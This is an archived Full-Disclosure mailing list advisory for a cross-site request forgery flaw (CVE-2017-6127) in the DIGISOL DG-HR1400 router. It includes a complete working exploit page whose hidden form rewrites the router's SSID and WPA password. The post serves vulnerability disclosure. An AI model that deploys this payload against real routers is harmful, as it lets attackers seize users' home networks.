lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CACP8YJmyH-U1OfngR2oiKx9q5as1i8Zo3MZjhLPVrjPQtbjxKA@mail.gmail.com> Date: Thu, 23 Feb 2017 15:20:39 +0530 From: Indrajith AN <indu.an444@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Multiple cross-site request forgery (CSRF) vulnerabilities in the DIGISOL (DG-HR 1400) Wireless Router Title: ==== DIGISOL DG-HR1400 Wireless router – Cross-Site Request Forgery (CSRF) vulnerability Credit: ====== Name: Indrajith.A.N Website: https://www.indrajithan.com Company: PwC-SDC Reference: ========= CVE Details: CVE-2017-6127 Date: ==== 23-02-2017 Vendor: ====== DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure. Product: ======= DIGISOL DG-HR1400 is a wireless Router Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf Abstract: ======= Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.\ Affected Version: ============= <=1.00.02 Exploitation-Technique: =================== Remote Severity Rating: =================== 7.9 Details: ======= An attacker who lures a DG-HR1400 authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the SSID name, password, security type etc. Proof Of Concept: ================ 1) User login to DG-HR1400 wireless router 2) User visits the attacker's malicious web page (attack.html) 3) attack.html exploits CSRF vulnerability and changes the SSID name and password Exploit code (attack.html): <html> Digisol Router CSRF Exploit - Indrajith A.N <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.2.1/form2WlanBasicSetup.cgi"; method="POST"> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="apssid" value="hacked" /> <input type="hidden" name="startScanUplinkAp" value="0" /> <input type="hidden" name="domain" value="1" /> <input type="hidden" name="hiddenSSID" value="on" /> <input type="hidden" name="ssid" value="hacked" /> <input type="hidden" name="band" value="10" /> <input type="hidden" name="chan" value="6" /> <input type="hidden" name="chanwid" value="1" /> <input type="hidden" name="txRate" value="0" /> <input type="hidden" name="method_cur" value="6" /> <input type="hidden" name="method" value="6" /> <input type="hidden" name="authType" value="2" /> <input type="hidden" name="length" value="1" /> <input type="hidden" name="format" value="2" /> <input type="hidden" name="defaultTxKeyId" value="1" /> <input type="hidden" name="key1" value="0000000000" /> <input type="hidden" name="pskFormat" value="0" /> <input type="hidden" name="pskValue" value="csrf1234" /> <input type="hidden" name="checkWPS2" value="1" /> <input type="hidden" name="save" value="Apply" /> <input type="hidden" name="basicrates" value="15" /> <input type="hidden" name="operrates" value="4095" /> <input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" /> <input type="submit" value="Submit request" /> </form> </body> </html> Disclosure Timeline: ====================================== Vendor Notification: December 18, 2016 -- Indrajith _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists